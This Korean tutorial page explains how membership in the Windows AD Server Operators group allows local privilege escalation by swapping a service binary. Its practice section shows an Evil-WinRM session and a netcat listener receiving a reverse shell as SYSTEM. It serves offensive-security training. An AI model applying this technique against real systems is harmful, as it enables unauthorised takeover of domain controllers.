Server Operators 그룹은 Windows의 Active Directory 환경에서만 존재하는 그룹입니다.
이 그룹은 서버 운영자 그룹이며 구성원들은 도메인 컨트롤러를 관리할 수 있습니다.
기본적으로 그룹에는 멤버가 없으며 이 그룹의 이름을 변경하거나 삭제는 불가능합니다.
이 그룹의 권한이 서비스의 바이너리 경로를 변경할 수 있기 때문에
우리가 장악한 계정이 Server Operators 그룹에 소속되어 있다면
특정 서비스의 바이너리 파일을 악성코드로 변경한 뒤 재실행하여 로컬 권한상승이 가능합니다.
Practice
*Evil-WinRM* PS C:\Users\wiki\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
=========== ==============================================
offsec\wiki S-1-5-21-4273732785-2380758271-4255945284-1110
GROUP INFORMATION
-----------------
Group Name Type SID
============================================= ================ =============
Everyone Well-known group S-1-1-0
BUILTIN\Server Operators Alias S-1-5-32-549
장악한 wiki 사용자는 Server Operators 그룹에 소속되어 있습니다.
이 그룹에 속하여 권한을 부여 받더라도 모든 서비스의 바이너리 경로를 변경할 수는 없습니다.
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.10] 60354
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system